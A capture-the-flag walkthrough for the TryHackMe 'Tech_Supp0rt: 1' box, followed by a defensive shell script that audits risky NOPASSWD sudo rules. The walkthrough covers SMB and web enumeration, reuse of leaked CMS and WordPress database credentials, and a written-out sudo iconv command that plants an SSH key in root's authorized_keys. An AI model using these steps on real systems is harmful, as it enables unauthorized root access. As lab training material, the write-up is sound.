Tech_Supp0rt: 1 (Decoding, SubrionCMS, iconv)

First, we need to enumerate using nmap.

╭─hnl@hnl ~/Desktop/ctf/tryhackme/techsupp0rt1  
╰─➤  nmap -A 10.10.164.236 | tee nmap.log
Starting Nmap 7.80 ( https://nmap.org ) at 2022-04-17 21:43 +0630
Nmap scan report for 10.10.164.236
Host is up (0.23s latency).
Not shown: 996 closed ports
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 10:8a:f5:72:d7:f9:7e:14:a5:c5:4f:9e:97:8b:3d:58 (RSA)
|   256 7f:10:f5:57:41:3c:71:db:b5:5b:db:75:c9:76:30:5c (ECDSA)
|_  256 6b:4c:23:50:6f:36:00:7c:a6:7c:11:73:c1:a8:60:0c (ED25519)
80/tcp  open  http        Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
Service Info: Host: TECHSUPPORT; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -1h50m51s, deviation: 3h10m29s, median: -52s
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: techsupport
|   NetBIOS computer name: TECHSUPPORT\x00
|   Domain name: \x00
|   FQDN: techsupport
|_  System time: 2022-04-17T20:43:37+05:30
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2022-04-17T15:13:35
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 65.62 seconds

SSH, HTTP and SMB ports are open. Let's enumerate the SMB port first.

╭─hnl@hnl ~/Desktop/ctf/tryhackme/techsupp0rt1  
╰─➤  smbclient -L '\\10.10.164.236'
Enter WORKGROUP\hnl's password: 

	Sharename       Type      Comment
	---------       ----      -------
	print$          Disk      Printer Drivers
	websvr          Disk      
	IPC$            IPC       IPC Service (TechSupport server (Samba, Ubuntu))
SMB1 disabled -- no workgroup available

We can see an interesting share called websvr. Connect to this SMB share and download the file it contains.

╭─hnl@hnl ~/Desktop/ctf/tryhackme/techsupp0rt1  
╰─➤  smbclient '\\10.10.164.236\websvr' 
Enter WORKGROUP\hnl's password: 
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Sat May 29 13:47:38 2021
  ..                                  D        0  Sat May 29 13:33:47 2021
  enter.txt                           N      273  Sat May 29 13:47:38 2021

		8460484 blocks of size 1024. 5698824 blocks available
smb: \> get enter.txt
getting file \enter.txt of size 273 as enter.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
smb: \> exit

Read the file. It contains some interesting information.

╭─hnl@hnl ~/Desktop/ctf/tryhackme/techsupp0rt1  
╰─➤  cat enter.txt 
GOALS
=====
1)Make fake popup and host it online on Digital Ocean server
2)Fix subrion site, /subrion doesn't work, edit from panel
3)Edit wordpress website

IMP
===
Subrion creds
|->admin:7sKvntXdPEJaxazce9PXi24zaFrLiKWCk [cooked with magical formula]
Wordpress creds
|->

Decode the Subrion password using CyberChef (the decoded value, admin:Scam2021, is used below).

Let's move on to HTTP. Browsing to the IP shows the Apache default page, so search for subdirectories using gobuster.

╭─hnl@hnl ~/Desktop/ctf/tryhackme/techsupp0rt1  
╰─➤  gobuster -u http://10.10.164.236/ -w /usr/share/wordlists/directory-list-2.3-medium.txt           

=====================================================
Gobuster v2.0.1              OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://10.10.164.236/
[+] Threads      : 10
[+] Wordlist     : /usr/share/wordlists/directory-list-2.3-medium.txt
[+] Status codes : 200,204,301,302,307,403
[+] Timeout      : 10s
=====================================================
2022/04/17 22:19:00 Starting gobuster
=====================================================
/wordpress (Status: 301)
/test (Status: 301)

http://10.10.164.236/wordpress/ points to the WordPress site. Every WordPress site has wp-admin.php, but the decoded credentials admin:Scam2021 did not work there.

http://10.10.164.236/test/ points to the phishing page.

Looking at enter.txt, you will see a directory called /subrion. Browsing to http://10.10.164.236/subrion shows nothing, so request it with curl.

╭─hnl@hnl ~/Desktop/ctf/tryhackme/techsupp0rt1  
╰─➤  curl -v http://10.10.164.236/subrion
*   Trying 10.10.164.236:80...
* TCP_NODELAY set
* Connected to 10.10.164.236 (10.10.164.236) port 80 (#0)
> GET /subrion HTTP/1.1
> Host: 10.10.164.236
> User-Agent: curl/7.68.0
> Accept: */*
> 
* Mark bundle as not supporting multiuse
< HTTP/1.1 301 Moved Permanently
< Date: Sun, 17 Apr 2022 18:09:59 GMT
< Server: Apache/2.4.18 (Ubuntu)
< Location: http://10.10.164.236/subrion/
< Content-Length: 316
< Content-Type: text/html; charset=iso-8859-1
< 
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://10.10.164.236/subrion/">here</a>.</p>
<hr>
<address>Apache/2.4.18 (Ubuntu) Server at 10.10.164.236 Port 80</address>
</body></html>
* Connection #0 to host 10.10.164.236 left intact

The response is only a redirect to /subrion/, which is still blank. How about robots.txt?

Browse to http://10.10.164.236/subrion/panel/ and log in using admin:Scam2021. You will find a dashboard.

The site is built with Subrion CMS v4.2.1. Searching for a public exploit turns up this PoC: https://www.exploit-db.com/exploits/49876. Download and run it.

You can see the WordPress database configuration in /var/www/html/wordpress.

$ cat /var/www/html/wordpress/wp-config.php
<?php
/**
 * The base configuration for WordPress
 *
 * The wp-config.php creation script uses this file during the
 * installation. You don't have to use the web site, you can
 * copy this file to "wp-config.php" and fill in the values.
 *
 * This file contains the following configurations:
 *
 * * MySQL settings
 * * Secret keys
 * * Database table prefix
 * * ABSPATH
 *
 * @link https://wordpress.org/support/article/editing-wp-config-php/
 *
 * @package WordPress
 */

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'wpdb' );

/** MySQL database username */
define( 'DB_USER', 'support' );

/** MySQL database password */
define( 'DB_PASSWORD', 'ImAScammerLOL!123!' );

Try SSH as the scamsite user with that password. It succeeds.

Looking around the system, we see the user can run /usr/bin/iconv as root via sudo.

scamsite@TechSupport:~$ sudo -l
Matching Defaults entries for scamsite on TechSupport:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User scamsite may run the following commands on TechSupport:
    (ALL) NOPASSWD: /usr/bin/iconv

Use the GTFOBins technique for iconv (https://gtfobins.github.io/gtfobins/iconv/) to get a root shell: generate an SSH key pair on our host and write the public key into root's authorized_keys.

scamsite@TechSupport:~$ LFILE=/root/.ssh/authorized_keys
scamsite@TechSupport:~$ echo "ssh-rsa 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 hnl@hnl" | sudo /usr/bin/iconv -f 8859_1 -t 8859_1 -o "$LFILE"

Log in with our private key and we have root.
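The root cause here is a NOPASSWD sudo rule for a binary whose ordinary options (iconv -o) write to any path as root. As an added defender-side check that is not part of the original writeup, this POSIX shell function scans a saved `sudo -l` listing for such rules; the sample listing and the WRITERS list are constructed assumptions, not something the box ships.

```shell
#!/bin/sh
# Added audit helper: flag NOPASSWD sudo rules that hand out binaries able to
# write an arbitrary file as root (iconv -o is the one abused on this box).

# Constructed sample: the "sudo -l" listing from the box, plus one benign rule.
SUDO_L_OUTPUT='Matching Defaults entries for scamsite on TechSupport:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User scamsite may run the following commands on TechSupport:
    (ALL) NOPASSWD: /usr/bin/iconv
    (ALL) NOPASSWD: /usr/bin/apt-get update'

# Assumed list of binaries whose documented options write to a caller-chosen path.
WRITERS="iconv tee dd cp"

# flag_nopasswd_writers: read "sudo -l" text on stdin and print the full path
# of every NOPASSWD command whose basename is in $WRITERS, one per line.
flag_nopasswd_writers() {
    grep 'NOPASSWD:' | while IFS= read -r line; do
        cmd=${line#*NOPASSWD:}   # "(ALL) NOPASSWD: /usr/bin/iconv" -> " /usr/bin/iconv"
        cmd=${cmd# }             # drop the single leading space
        bin=${cmd%% *}           # keep the command path, drop any arguments
        base=${bin##*/}          # basename, e.g. "iconv"
        for w in $WRITERS; do
            if [ "$base" = "$w" ]; then
                echo "$bin"
            fi
        done
    done
}

# audit_sample: run the check over the constructed listing; returns 1 when
# anything is flagged so it can gate a CI job or config-management run.
audit_sample() {
    flagged=$(printf '%s\n' "$SUDO_L_OUTPUT" | flag_nopasswd_writers)
    if [ -n "$flagged" ]; then
        printf 'NOPASSWD rule allows arbitrary file write as root: %s\n' "$flagged" >&2
        return 1
    fi
    return 0
}

if audit_sample; then
    echo "no risky NOPASSWD rules found"
else
    echo "review the flagged rules: restrict the command or drop NOPASSWD"
fi
```

On a live host, feed it `sudo -l -U <user>` output instead of the constructed sample.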